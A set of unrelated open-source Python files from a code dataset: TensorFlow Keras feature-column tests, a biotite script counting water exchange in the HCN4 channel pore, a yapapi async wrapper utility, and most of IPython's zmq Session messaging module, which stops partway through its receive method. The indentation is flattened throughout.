if __name__ == "__main__":
main()
|
the-stack_106_23347 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests specific to Feature Columns integration."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python import keras
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.feature_column import feature_column_lib as fc
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import metrics as metrics_module
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.utils import np_utils
from tensorflow.python.platform import test
class TestDNNModel(keras.models.Model):
def __init__(self, feature_columns, units, name=None, **kwargs):
super(TestDNNModel, self).__init__(name=name, **kwargs)
self._input_layer = fc.DenseFeatures(feature_columns, name='input_layer')
self._dense_layer = keras.layers.Dense(units, name='dense_layer')
def call(self, features):
net = self._input_layer(features)
net = self._dense_layer(net)
return net
class FeatureColumnsIntegrationTest(keras_parameterized.TestCase):
"""Most Sequential model API tests are covered in `training_test.py`.
"""
@keras_parameterized.run_all_keras_modes
def test_sequential_model(self):
columns = [fc.numeric_column('a')]
model = keras.models.Sequential([
fc.DenseFeatures(columns),
keras.layers.Dense(64, activation='relu'),
keras.layers.Dense(20, activation='softmax')
])
model.compile(
optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['accuracy'],
run_eagerly=testing_utils.should_run_eagerly())
x = {'a': np.random.random((10, 1))}
y = np.random.randint(20, size=(10, 1))
y = np_utils.to_categorical(y, num_classes=20)
model.fit(x, y, epochs=1, batch_size=5)
model.fit(x, y, epochs=1, batch_size=5)
model.evaluate(x, y, batch_size=5)
model.predict(x, batch_size=5)
@keras_parameterized.run_all_keras_modes
def test_sequential_model_with_ds_input(self):
columns = [fc.numeric_column('a')]
model = keras.models.Sequential([
fc.DenseFeatures(columns),
keras.layers.Dense(64, activation='relu'),
keras.layers.Dense(20, activation='softmax')
])
model.compile(
optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['accuracy'],
run_eagerly=testing_utils.should_run_eagerly())
y = np.random.randint(20, size=(100, 1))
y = np_utils.to_categorical(y, num_classes=20)
x = {'a': np.random.random((100, 1))}
ds1 = dataset_ops.Dataset.from_tensor_slices(x)
ds2 = dataset_ops.Dataset.from_tensor_slices(y)
ds = dataset_ops.Dataset.zip((ds1, ds2)).batch(5)
model.fit(ds, steps_per_epoch=1)
model.fit(ds, steps_per_epoch=1)
model.evaluate(ds, steps=1)
model.predict(ds, steps=1)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_sequential_model_with_crossed_column(self):
feature_columns = []
age_buckets = fc.bucketized_column(
fc.numeric_column('age'),
boundaries=[18, 25, 30, 35, 40, 45, 50, 55, 60, 65])
feature_columns.append(age_buckets)
# indicator cols
thal = fc.categorical_column_with_vocabulary_list(
'thal', ['fixed', 'normal', 'reversible'])
crossed_feature = fc.crossed_column([age_buckets, thal],
hash_bucket_size=1000)
crossed_feature = fc.indicator_column(crossed_feature)
feature_columns.append(crossed_feature)
feature_layer = fc.DenseFeatures(feature_columns)
model = keras.models.Sequential([
feature_layer,
keras.layers.Dense(128, activation='relu'),
keras.layers.Dense(128, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
])
age_data = np.random.randint(10, 100, size=100)
thal_data = np.random.choice(['fixed', 'normal', 'reversible'], size=100)
inp_x = {'age': age_data, 'thal': thal_data}
inp_y = np.random.randint(0, 1, size=100)
ds = dataset_ops.Dataset.from_tensor_slices((inp_x, inp_y)).batch(5)
model.compile(optimizer='adam',
loss='binary_crossentropy',
metrics=['accuracy'],)
model.fit(ds, epochs=1)
model.fit(ds, epochs=1)
model.evaluate(ds)
model.predict(ds)
@keras_parameterized.run_all_keras_modes
def test_subclassed_model_with_feature_columns(self):
col_a = fc.numeric_column('a')
col_b = fc.numeric_column('b')
dnn_model = TestDNNModel([col_a, col_b], 20)
dnn_model.compile(
optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['accuracy'],
run_eagerly=testing_utils.should_run_eagerly())
x = {'a': np.random.random((10, 1)), 'b': np.random.random((10, 1))}
y = np.random.randint(20, size=(10, 1))
y = np_utils.to_categorical(y, num_classes=20)
dnn_model.fit(x=x, y=y, epochs=1, batch_size=5)
dnn_model.fit(x=x, y=y, epochs=1, batch_size=5)
dnn_model.evaluate(x=x, y=y, batch_size=5)
dnn_model.predict(x=x, batch_size=5)
@keras_parameterized.run_all_keras_modes
def test_subclassed_model_with_feature_columns_with_ds_input(self):
col_a = fc.numeric_column('a')
col_b = fc.numeric_column('b')
dnn_model = TestDNNModel([col_a, col_b], 20)
dnn_model.compile(
optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['accuracy'],
run_eagerly=testing_utils.should_run_eagerly())
y = np.random.randint(20, size=(100, 1))
y = np_utils.to_categorical(y, num_classes=20)
x = {'a': np.random.random((100, 1)), 'b': np.random.random((100, 1))}
ds1 = dataset_ops.Dataset.from_tensor_slices(x)
ds2 = dataset_ops.Dataset.from_tensor_slices(y)
ds = dataset_ops.Dataset.zip((ds1, ds2)).batch(5)
dnn_model.fit(ds, steps_per_epoch=1)
dnn_model.fit(ds, steps_per_epoch=1)
dnn_model.evaluate(ds, steps=1)
dnn_model.predict(ds, steps=1)
# TODO(kaftan) seems to throw an error when enabled.
@keras_parameterized.run_all_keras_modes
def DISABLED_test_function_model_feature_layer_input(self):
col_a = fc.numeric_column('a')
col_b = fc.numeric_column('b')
feature_layer = fc.DenseFeatures([col_a, col_b], name='fc')
dense = keras.layers.Dense(4)
# This seems problematic.... We probably need something for DenseFeatures
# the way Input is for InputLayer.
output = dense(feature_layer)
model = keras.models.Model([feature_layer], [output])
optimizer = 'rmsprop'
loss = 'mse'
loss_weights = [1., 0.5]
model.compile(
optimizer,
loss,
metrics=[metrics_module.CategoricalAccuracy(), 'mae'],
loss_weights=loss_weights)
data = ({'a': np.arange(10), 'b': np.arange(10)}, np.arange(10, 20))
model.fit(*data, epochs=1)
# TODO(kaftan) seems to throw an error when enabled.
@keras_parameterized.run_all_keras_modes
def DISABLED_test_function_model_multiple_feature_layer_inputs(self):
col_a = fc.numeric_column('a')
col_b = fc.numeric_column('b')
col_c = fc.numeric_column('c')
fc1 = fc.DenseFeatures([col_a, col_b], name='fc1')
fc2 = fc.DenseFeatures([col_b, col_c], name='fc2')
dense = keras.layers.Dense(4)
# This seems problematic.... We probably need something for DenseFeatures
# the way Input is for InputLayer.
output = dense(fc1) + dense(fc2)
model = keras.models.Model([fc1, fc2], [output])
optimizer = 'rmsprop'
loss = 'mse'
loss_weights = [1., 0.5]
model.compile(
optimizer,
loss,
metrics=[metrics_module.CategoricalAccuracy(), 'mae'],
loss_weights=loss_weights)
data_list = ([{
'a': np.arange(10),
'b': np.arange(10)
}, {
'b': np.arange(10),
'c': np.arange(10)
}], np.arange(10, 100))
model.fit(*data_list, epochs=1)
data_bloated_list = ([{
'a': np.arange(10),
'b': np.arange(10),
'c': np.arange(10)
}, {
'a': np.arange(10),
'b': np.arange(10),
'c': np.arange(10)
}], np.arange(10, 100))
model.fit(*data_bloated_list, epochs=1)
data_dict = ({
'fc1': {
'a': np.arange(10),
'b': np.arange(10)
},
'fc2': {
'b': np.arange(10),
'c': np.arange(10)
}
}, np.arange(10, 100))
model.fit(*data_dict, epochs=1)
data_bloated_dict = ({
'fc1': {
'a': np.arange(10),
'b': np.arange(10),
'c': np.arange(10)
},
'fc2': {
'a': np.arange(10),
'b': np.arange(10),
'c': np.arange(10)
}
}, np.arange(10, 100))
model.fit(*data_bloated_dict, epochs=1)
@keras_parameterized.run_all_keras_modes
def test_string_input(self):
x = {'age': np.random.random((1024, 1)),
'cabin': np.array(['a'] * 1024)}
y = np.random.randint(2, size=(1024, 1))
ds1 = dataset_ops.Dataset.from_tensor_slices(x)
ds2 = dataset_ops.Dataset.from_tensor_slices(y)
dataset = dataset_ops.Dataset.zip((ds1, ds2)).batch(4)
categorical_cols = [fc.categorical_column_with_hash_bucket('cabin', 10)]
feature_cols = ([fc.numeric_column('age')]
+ [fc.indicator_column(cc) for cc in categorical_cols])
layers = [fc.DenseFeatures(feature_cols),
keras.layers.Dense(128),
keras.layers.Dense(1)]
model = keras.models.Sequential(layers)
model.compile(optimizer='sgd',
loss=keras.losses.BinaryCrossentropy())
model.fit(dataset)
if __name__ == '__main__':
test.main()
|
the-stack_106_23349 | r"""
Cavity solvation in different states of HCN4
============================================
In selective sodium/potassium channels, the internal cavity of the pore
is walled off from the solvent if the channel is closed.
Upon activation, the internal gate opens and exchange of water molecules
between the cavity and the bulk medium is possible.
Therefore, one can track the exchange rate of water molecules between
the cavity and bulk to evaluate if a pore is open, closed, or in a
transition between the two. Here, we used the distance between water
molecules and residues located in the central cavity to evaluate if
persistant water exchange takes place in different structures of the
HCN4 channel.
The trajectories and template structure are not included in this
example.
However, the trajectories are based of publicly accessible structures
of the open (PDB: 7NP3) and closed (PDB: 7NP4) state.
.. image:: ../../scripts/structure/water_exchange.png
"""
# Code source: Daniel Bauer, Patrick Kunzmann
# License: BSD 3 clause
import matplotlib.pyplot as plt
import numpy as np
import biotite
import biotite.structure.io.gro as gro
import biotite.structure.io.xtc as xtc
import biotite.structure as struct
def water_in_prox(atoms, sele, cutoff):
"""
Get the atom indices of water oxygen atoms that are in vicinity of
the selected atoms.
"""
cell_list = struct.CellList(atoms, cell_size=5,
selection=atoms.atom_name == "OW")
adjacent_atoms = cell_list.get_atoms(atoms[sele].coord, cutoff)
adjacent_atoms = np.unique(adjacent_atoms.flatten())
adjacent_atoms = adjacent_atoms[adjacent_atoms > 0]
return adjacent_atoms
def cum_water_in_pore(traj, cutoff=6, key_residues=(507, 511)):
"""
Calculate the cumulative number of water molecules visiting the
pore.
"""
protein_sele = np.isin(traj.res_id, key_residues) \
& ~np.isin(traj.atom_name, ["N", "O", "CA", "C"])
water_count = np.zeros(traj.shape[0])
prev_counted_indices = []
for idx, frame in enumerate(traj):
indices = water_in_prox(frame, protein_sele, cutoff)
count = (~np.isin(indices, prev_counted_indices)).sum()
if idx != 0:
count += water_count[idx-1]
water_count[idx] = count
prev_counted_indices = indices
return water_count
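# Illustrative sketch (added for clarity, not part of the original analysis):
# the cumulative count above only adds water molecules that were absent from
# the previous frame's proximity list. The toy frames below are made up to
# demonstrate that bookkeeping with plain index arrays.
def _demo_cumulative_count():
    frames = [
        np.array([1, 2, 3]),   # three waters enter
        np.array([2, 3]),      # nothing new
        np.array([3, 4, 5]),   # two new waters
    ]
    count = np.zeros(len(frames))
    prev = np.array([], dtype=int)
    for idx, indices in enumerate(frames):
        new = (~np.isin(indices, prev)).sum()
        count[idx] = new + (count[idx - 1] if idx > 0 else 0)
        prev = indices
    return count  # expected: [3., 3., 5.]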
# Calculate the cumulative number of water molecules visiting the pore
# for the open and closed state
counts = []
for name in ["apo", "holo"]:
gro_file = gro.GROFile.read(f"{name}.gro")
template = gro_file.get_structure(model=1)
# Represent the water molecules by the oxygen atom
filter_indices = np.where(
struct.filter_amino_acids(template) | (template.atom_name == "OW")
)[0]
xtc_file = xtc.XTCFile.read(f"{name}.xtc", atom_i=filter_indices)
traj = xtc_file.get_structure(template[filter_indices])
cum_count = cum_water_in_pore(traj)
counts.append(cum_count)
time = np.arange(len(counts[0])) * 40 / 1000
# Linear fitting
open_fit = np.polyfit(time, counts[0], 1)
closed_fit = np.polyfit(time, counts[1], 1)
fig, ax = plt.subplots(figsize=(8.0, 4.0))
ax.plot(time, counts[0],
label="open pore", color=biotite.colors["dimgreen"])
ax.plot(time, open_fit[0]*time+open_fit[1],
linestyle="--", color="black", zorder=-1)
ax.plot(time, counts[1],
label="closed pore", color=biotite.colors["lightorange"])
ax.plot(time, closed_fit[0]*time+closed_fit[1],
linestyle="--", color="black", zorder=-1)
ax.set(
xlabel = "Time / ns",
ylabel = "Count",
title = "Cumulative count\nof individual water molecules visiting the pore"
)
ax.legend()
ax.annotate(f"{open_fit[0]:.1f} per ns",
xy=(20, 20*open_fit[0]+open_fit[1]+100),
xytext=(20-5, 20*open_fit[0]+open_fit[1]+1300),
arrowprops=dict(facecolor=biotite.colors["darkgreen"]),
va="center")
ax.annotate(f"{closed_fit[0]:.1f} per ns",
xy=(30, 20*closed_fit[0]+closed_fit[1]+100),
xytext=(30+2, 20*closed_fit[0]+closed_fit[1]+1300),
arrowprops=dict(facecolor=biotite.colors["orange"]),
va="center")
fig.savefig("water_exchange.png", bbox_inches="tight")
plt.show() |
the-stack_106_23350 | """Utility functions and classes used within the `yapapi.executor` package."""
import asyncio
import logging
from typing import Callable, Optional
logger = logging.getLogger(__name__)
class AsyncWrapper:
"""Wraps a given callable to provide asynchronous calls.
Example usage:
with AsyncWrapper(func) as wrapper:
wrapper.async_call("Hello", world=True)
wrapper.async_call("Bye!")
The above code will make two asynchronous calls to `func`.
The results of the calls, if any, are discarded, so this class is
most useful for wrapping callables that return `None`.
"""
_wrapped: Callable
_args_buffer: asyncio.Queue
_task: Optional[asyncio.Task]
def __init__(self, wrapped: Callable, event_loop: Optional[asyncio.AbstractEventLoop] = None):
self._wrapped = wrapped # type: ignore # suppress mypy issue #708
self._args_buffer = asyncio.Queue()
loop = event_loop or asyncio.get_event_loop()
self._task = loop.create_task(self._worker())
async def _worker(self) -> None:
while True:
try:
(args, kwargs) = await self._args_buffer.get()
try:
self._wrapped(*args, **kwargs)
finally:
self._args_buffer.task_done()
except KeyboardInterrupt as ke:
# Don't stop on KeyboardInterrupt, but pass it to the event loop
logger.debug("Caught KeybordInterrupt in AsyncWrapper's worker task")
def raise_interrupt(ke_):
raise ke_
asyncio.get_event_loop().call_soon(raise_interrupt, ke)
except asyncio.CancelledError:
logger.debug("AsyncWrapper's worker task cancelled")
break
except Exception:
logger.exception("Unhandled exception in wrapped callable")
async def stop(self) -> None:
"""Stop the wrapper, process queued calls but do not accept any new ones."""
if self._task:
# Set self._task to None so we don't accept any more calls in `async_call()`
worker_task = self._task
self._task = None
await self._args_buffer.join()
worker_task.cancel()
await asyncio.gather(worker_task, return_exceptions=True)
def async_call(self, *args, **kwargs) -> None:
"""Schedule an asynchronous call to the wrapped callable."""
if not self._task or self._task.done():
raise RuntimeError("AsyncWrapper is closed")
self._args_buffer.put_nowait((args, kwargs))
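# Hedged usage sketch (added, not part of the original module): how a caller
# might drive AsyncWrapper inside a running event loop and shut it down
# cleanly. `handle_event` and its arguments are made up for illustration;
# run e.g. with asyncio.run(_example_usage()).
async def _example_usage():
    def handle_event(name, **kwargs):
        logger.info("event %s %r", name, kwargs)

    wrapper = AsyncWrapper(handle_event)
    wrapper.async_call("started", attempt=1)
    wrapper.async_call("finished")
    # stop() drains the queue, then cancels the worker task.
    await wrapper.stop()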
|
the-stack_106_23354 | """Session object for building, serializing, sending, and receiving messages in
IPython. The Session object supports serialization, HMAC signatures, and
metadata on messages.
Also defined here are utilities for working with Sessions:
* A SessionFactory to be used as a base class for configurables that work with
Sessions.
* A Message object for convenience that allows attribute-access to the msg dict.
Authors:
* Min RK
* Brian Granger
* Fernando Perez
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2010-2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import hmac
import logging
import os
import pprint
import uuid
from datetime import datetime
try:
import cPickle
pickle = cPickle
except:
cPickle = None
import pickle
import zmq
from zmq.utils import jsonapi
from zmq.eventloop.ioloop import IOLoop
from zmq.eventloop.zmqstream import ZMQStream
from IPython.config.application import Application, boolean_flag
from IPython.config.configurable import Configurable, LoggingConfigurable
from IPython.utils.importstring import import_item
from IPython.utils.jsonutil import extract_dates, squash_dates, date_default
from IPython.utils.py3compat import str_to_bytes
from IPython.utils.traitlets import (CBytes, Unicode, Bool, Any, Instance, Set,
DottedObjectName, CUnicode)
#-----------------------------------------------------------------------------
# utility functions
#-----------------------------------------------------------------------------
def squash_unicode(obj):
"""coerce unicode back to bytestrings."""
if isinstance(obj,dict):
for key in obj.keys():
obj[key] = squash_unicode(obj[key])
if isinstance(key, unicode):
obj[squash_unicode(key)] = obj.pop(key)
elif isinstance(obj, list):
for i,v in enumerate(obj):
obj[i] = squash_unicode(v)
elif isinstance(obj, unicode):
obj = obj.encode('utf8')
return obj
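# Added note: squash_unicode recurses through dicts and lists, UTF-8-encoding
# every unicode string (including dict keys), e.g. under Python 2
# squash_unicode({u'a': [u'b', 1]}) -> {'a': ['b', 1]}, so that message parts
# end up as the bytestrings zmq expects.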
#-----------------------------------------------------------------------------
# globals and defaults
#-----------------------------------------------------------------------------
# ISO8601-ify datetime objects
json_packer = lambda obj: jsonapi.dumps(obj, default=date_default)
json_unpacker = lambda s: extract_dates(jsonapi.loads(s))
pickle_packer = lambda o: pickle.dumps(o,-1)
pickle_unpacker = pickle.loads
default_packer = json_packer
default_unpacker = json_unpacker
DELIM=b"<IDS|MSG>"
#-----------------------------------------------------------------------------
# Mixin tools for apps that use Sessions
#-----------------------------------------------------------------------------
session_aliases = dict(
ident = 'Session.session',
user = 'Session.username',
keyfile = 'Session.keyfile',
)
session_flags = {
'secure' : ({'Session' : { 'key' : str_to_bytes(str(uuid.uuid4())),
'keyfile' : '' }},
"""Use HMAC digests for authentication of messages.
Setting this flag will generate a new UUID to use as the HMAC key.
"""),
'no-secure' : ({'Session' : { 'key' : b'', 'keyfile' : '' }},
"""Don't authenticate messages."""),
}
def default_secure(cfg):
"""Set the default behavior for a config environment to be secure.
If Session.key/keyfile have not been set, set Session.key to
a new random UUID.
"""
if 'Session' in cfg:
if 'key' in cfg.Session or 'keyfile' in cfg.Session:
return
# key/keyfile not specified, generate new UUID:
cfg.Session.key = str_to_bytes(str(uuid.uuid4()))
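# Typical call site (illustrative assumption, not from this module): an
# application initializes its config before building a Session, e.g.
#
#     from IPython.config.loader import Config
#     config = Config()
#     default_secure(config)        # generates config.Session.key if unset
#     session = Session(config=config)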
#-----------------------------------------------------------------------------
# Classes
#-----------------------------------------------------------------------------
class SessionFactory(LoggingConfigurable):
"""The Base class for configurables that have a Session, Context, logger,
and IOLoop.
"""
logname = Unicode('')
def _logname_changed(self, name, old, new):
self.log = logging.getLogger(new)
# not configurable:
context = Instance('zmq.Context')
def _context_default(self):
return zmq.Context.instance()
session = Instance('IPython.zmq.session.Session')
loop = Instance('zmq.eventloop.ioloop.IOLoop', allow_none=False)
def _loop_default(self):
return IOLoop.instance()
def __init__(self, **kwargs):
super(SessionFactory, self).__init__(**kwargs)
if self.session is None:
# construct the session
self.session = Session(**kwargs)
class Message(object):
"""A simple message object that maps dict keys to attributes.
A Message can be created from a dict and a dict from a Message instance
simply by calling dict(msg_obj)."""
def __init__(self, msg_dict):
dct = self.__dict__
for k, v in dict(msg_dict).iteritems():
if isinstance(v, dict):
v = Message(v)
dct[k] = v
# Having this iterator lets dict(msg_obj) work out of the box.
def __iter__(self):
return iter(self.__dict__.iteritems())
def __repr__(self):
return repr(self.__dict__)
def __str__(self):
return pprint.pformat(self.__dict__)
def __contains__(self, k):
return k in self.__dict__
def __getitem__(self, k):
return self.__dict__[k]
def msg_header(msg_id, msg_type, username, session):
date = datetime.now()
return locals()
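# Added note: ``return locals()`` above packages the four arguments plus the
# freshly generated ``date`` into a dict, i.e. roughly
# {'msg_id': msg_id, 'msg_type': msg_type, 'username': username,
#  'session': session, 'date': date}.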
def extract_header(msg_or_header):
"""Given a message or header, return the header."""
if not msg_or_header:
return {}
try:
# See if msg_or_header is the entire message.
h = msg_or_header['header']
except KeyError:
try:
# See if msg_or_header is just the header
h = msg_or_header['msg_id']
except KeyError:
raise
else:
h = msg_or_header
if not isinstance(h, dict):
h = dict(h)
return h
class Session(Configurable):
"""Object for handling serialization and sending of messages.
The Session object handles building messages and sending them
with ZMQ sockets or ZMQStream objects. Objects can communicate with each
other over the network via Session objects, and only need to work with the
dict-based IPython message spec. The Session will handle
serialization/deserialization, security, and metadata.
Sessions support configurable serialization via packer/unpacker traits,
and signing with HMAC digests via the key/keyfile traits.
Parameters
----------
debug : bool
whether to trigger extra debugging statements
packer/unpacker : str : 'json', 'pickle' or import_string
importstrings for methods to serialize message parts. If just
'json' or 'pickle', predefined JSON and pickle packers will be used.
Otherwise, the entire importstring must be used.
The functions must accept at least valid JSON input, and output *bytes*.
For example, to use msgpack:
packer = 'msgpack.packb', unpacker='msgpack.unpackb'
pack/unpack : callables
You can also set the pack/unpack callables for serialization directly.
session : bytes
the ID of this Session object. The default is to generate a new UUID.
username : unicode
username added to message headers. The default is to ask the OS.
key : bytes
The key used to initialize an HMAC signature. If unset, messages
will not be signed or checked.
keyfile : filepath
The file containing a key. If this is set, `key` will be initialized
to the contents of the file.
"""
debug=Bool(False, config=True, help="""Debug output in the Session""")
packer = DottedObjectName('json',config=True,
help="""The name of the packer for serializing messages.
Should be one of 'json', 'pickle', or an import name
for a custom callable serializer.""")
def _packer_changed(self, name, old, new):
if new.lower() == 'json':
self.pack = json_packer
self.unpack = json_unpacker
elif new.lower() == 'pickle':
self.pack = pickle_packer
self.unpack = pickle_unpacker
else:
self.pack = import_item(str(new))
unpacker = DottedObjectName('json', config=True,
help="""The name of the unpacker for unserializing messages.
Only used with custom functions for `packer`.""")
def _unpacker_changed(self, name, old, new):
if new.lower() == 'json':
self.pack = json_packer
self.unpack = json_unpacker
elif new.lower() == 'pickle':
self.pack = pickle_packer
self.unpack = pickle_unpacker
else:
self.unpack = import_item(str(new))
session = CUnicode(u'', config=True,
help="""The UUID identifying this session.""")
def _session_default(self):
u = unicode(uuid.uuid4())
self.bsession = u.encode('ascii')
return u
def _session_changed(self, name, old, new):
self.bsession = self.session.encode('ascii')
# bsession is the session as bytes
bsession = CBytes(b'')
username = Unicode(os.environ.get('USER',u'username'), config=True,
help="""Username for the Session. Default is your system username.""")
# message signature related traits:
key = CBytes(b'', config=True,
help="""execution key, for extra authentication.""")
def _key_changed(self, name, old, new):
if new:
self.auth = hmac.HMAC(new)
else:
self.auth = None
auth = Instance(hmac.HMAC)
digest_history = Set()
keyfile = Unicode('', config=True,
help="""path to file containing execution key.""")
def _keyfile_changed(self, name, old, new):
with open(new, 'rb') as f:
self.key = f.read().strip()
# serialization traits:
pack = Any(default_packer) # the actual packer function
def _pack_changed(self, name, old, new):
if not callable(new):
raise TypeError("packer must be callable, not %s"%type(new))
unpack = Any(default_unpacker) # the actual unpacker function
def _unpack_changed(self, name, old, new):
# unpacker is not checked - it is assumed to be the inverse of the packer
if not callable(new):
raise TypeError("unpacker must be callable, not %s"%type(new))
def __init__(self, **kwargs):
"""create a Session object
Parameters
----------
debug : bool
whether to trigger extra debugging statements
packer/unpacker : str : 'json', 'pickle' or import_string
importstrings for methods to serialize message parts. If just
'json' or 'pickle', predefined JSON and pickle packers will be used.
Otherwise, the entire importstring must be used.
The functions must accept at least valid JSON input, and output
*bytes*.
For example, to use msgpack:
packer = 'msgpack.packb', unpacker='msgpack.unpackb'
pack/unpack : callables
You can also set the pack/unpack callables for serialization
directly.
session : unicode (must be ascii)
the ID of this Session object. The default is to generate a new
UUID.
bsession : bytes
The session as bytes
username : unicode
username added to message headers. The default is to ask the OS.
key : bytes
The key used to initialize an HMAC signature. If unset, messages
will not be signed or checked.
keyfile : filepath
The file containing a key. If this is set, `key` will be
initialized to the contents of the file.
"""
super(Session, self).__init__(**kwargs)
self._check_packers()
self.none = self.pack({})
# ensure self._session_default() if necessary, so bsession is defined:
self.session
@property
def msg_id(self):
"""always return new uuid"""
return str(uuid.uuid4())
def _check_packers(self):
"""check packers for binary data and datetime support."""
pack = self.pack
unpack = self.unpack
# check simple serialization
msg = dict(a=[1,'hi'])
try:
packed = pack(msg)
except Exception:
raise ValueError("packer could not serialize a simple message")
# ensure packed message is bytes
if not isinstance(packed, bytes):
raise ValueError("message packed to %r, but bytes are required"%type(packed))
# check that unpack is pack's inverse
try:
unpacked = unpack(packed)
except Exception:
raise ValueError("unpacker could not handle the packer's output")
# check datetime support
msg = dict(t=datetime.now())
try:
unpacked = unpack(pack(msg))
except Exception:
self.pack = lambda o: pack(squash_dates(o))
self.unpack = lambda s: extract_dates(unpack(s))
def msg_header(self, msg_type):
return msg_header(self.msg_id, msg_type, self.username, self.session)
def msg(self, msg_type, content=None, parent=None, subheader=None, header=None):
"""Return the nested message dict.
This format is different from what is sent over the wire. The
serialize/unserialize methods convert this nested message dict to the wire
format, which is a list of message parts.
"""
msg = {}
header = self.msg_header(msg_type) if header is None else header
msg['header'] = header
msg['msg_id'] = header['msg_id']
msg['msg_type'] = header['msg_type']
msg['parent_header'] = {} if parent is None else extract_header(parent)
msg['content'] = {} if content is None else content
sub = {} if subheader is None else subheader
msg['header'].update(sub)
return msg
def sign(self, msg_list):
"""Sign a message with HMAC digest. If no auth, return b''.
Parameters
----------
msg_list : list
The [p_header,p_parent,p_content] part of the message list.
"""
if self.auth is None:
return b''
h = self.auth.copy()
for m in msg_list:
h.update(m)
return str_to_bytes(h.hexdigest())
def serialize(self, msg, ident=None):
"""Serialize the message components to bytes.
This is roughly the inverse of unserialize. The serialize/unserialize
methods work with full message lists, whereas pack/unpack work with
the individual message parts in the message list.
Parameters
----------
msg : dict or Message
The nested message dict as returned by the self.msg method.
Returns
-------
msg_list : list
The list of bytes objects to be sent with the format:
[ident1,ident2,...,DELIM,HMAC,p_header,p_parent,p_content,
buffer1,buffer2,...]. In this list, the p_* entities are
the packed or serialized versions, so if JSON is used, these
are utf8 encoded JSON strings.
"""
content = msg.get('content', {})
if content is None:
content = self.none
elif isinstance(content, dict):
content = self.pack(content)
elif isinstance(content, bytes):
# content is already packed, as in a relayed message
pass
elif isinstance(content, unicode):
# should be bytes, but JSON often spits out unicode
content = content.encode('utf8')
else:
raise TypeError("Content incorrect type: %s"%type(content))
real_message = [self.pack(msg['header']),
self.pack(msg['parent_header']),
content
]
to_send = []
if isinstance(ident, list):
# accept list of idents
to_send.extend(ident)
elif ident is not None:
to_send.append(ident)
to_send.append(DELIM)
signature = self.sign(real_message)
to_send.append(signature)
to_send.extend(real_message)
return to_send
def send(self, stream, msg_or_type, content=None, parent=None, ident=None,
buffers=None, subheader=None, track=False, header=None):
"""Build and send a message via stream or socket.
The message format used by this function internally is as follows:
[ident1,ident2,...,DELIM,HMAC,p_header,p_parent,p_content,
buffer1,buffer2,...]
The serialize/unserialize methods convert the nested message dict into this
format.
Parameters
----------
stream : zmq.Socket or ZMQStream
The socket-like object used to send the data.
msg_or_type : str or Message/dict
Normally, msg_or_type will be a msg_type unless a message is being
sent more than once. If a header is supplied, this can be set to
None and the msg_type will be pulled from the header.
content : dict or None
The content of the message (ignored if msg_or_type is a message).
header : dict or None
The header dict for the message (ignored if msg_or_type is a message).
parent : Message or dict or None
The parent or parent header describing the parent of this message
(ignored if msg_or_type is a message).
ident : bytes or list of bytes
The zmq.IDENTITY routing path.
subheader : dict or None
Extra header keys for this message's header (ignored if msg_or_type
is a message).
buffers : list or None
The already-serialized buffers to be appended to the message.
track : bool
Whether to track. Only for use with Sockets, because ZMQStream
objects cannot track messages.
Returns
-------
msg : dict
The constructed message.
(msg,tracker) : (dict, MessageTracker)
if track=True, then a 2-tuple will be returned,
the first element being the constructed
message, and the second being the MessageTracker
"""
if not isinstance(stream, (zmq.Socket, ZMQStream)):
raise TypeError("stream must be Socket or ZMQStream, not %r"%type(stream))
elif track and isinstance(stream, ZMQStream):
raise TypeError("ZMQStream cannot track messages")
if isinstance(msg_or_type, (Message, dict)):
# We got a Message or message dict, not a msg_type so don't
# build a new Message.
msg = msg_or_type
else:
msg = self.msg(msg_or_type, content=content, parent=parent,
subheader=subheader, header=header)
buffers = [] if buffers is None else buffers
to_send = self.serialize(msg, ident)
flag = 0
if buffers:
flag = zmq.SNDMORE
_track = False
else:
_track=track
if track:
tracker = stream.send_multipart(to_send, flag, copy=False, track=_track)
else:
tracker = stream.send_multipart(to_send, flag, copy=False)
for b in buffers[:-1]:
stream.send(b, flag, copy=False)
if buffers:
if track:
tracker = stream.send(buffers[-1], copy=False, track=track)
else:
tracker = stream.send(buffers[-1], copy=False)
# omsg = Message(msg)
if self.debug:
pprint.pprint(msg)
pprint.pprint(to_send)
pprint.pprint(buffers)
msg['tracker'] = tracker
return msg
def send_raw(self, stream, msg_list, flags=0, copy=True, ident=None):
"""Send a raw message via ident path.
This method is used to send an already serialized message.
Parameters
----------
stream : ZMQStream or Socket
The ZMQ stream or socket to use for sending the message.
msg_list : list
The serialized list of messages to send. This only includes the
[p_header,p_parent,p_content,buffer1,buffer2,...] portion of
the message.
ident : ident or list
A single ident or a list of idents to use in sending.
"""
to_send = []
if isinstance(ident, bytes):
ident = [ident]
if ident is not None:
to_send.extend(ident)
to_send.append(DELIM)
to_send.append(self.sign(msg_list))
to_send.extend(msg_list)
stream.send_multipart(to_send, flags, copy=copy)
def recv(self, socket, mode=zmq.NOBLOCK, content=True, copy=True):
"""Receive and unpack a message.
Parameters
----------
socket : ZMQStream or Socket
The socket or stream to use in receiving.
Returns
-------
[idents], msg
[idents] is a list of idents and msg is a nested message dict of
same format as self.msg returns.
"""
if isinstance(socket, ZMQStream):
socket = socket.socket
try:
msg_list = socket.recv_multipart(mode, copy=copy)
except zmq.ZMQError as e:
if e.errno == zmq.EAGAIN:
# We can convert EAGAIN to None as we know in this case
# recv_multipart won't return None.
return None,None
else:
raise
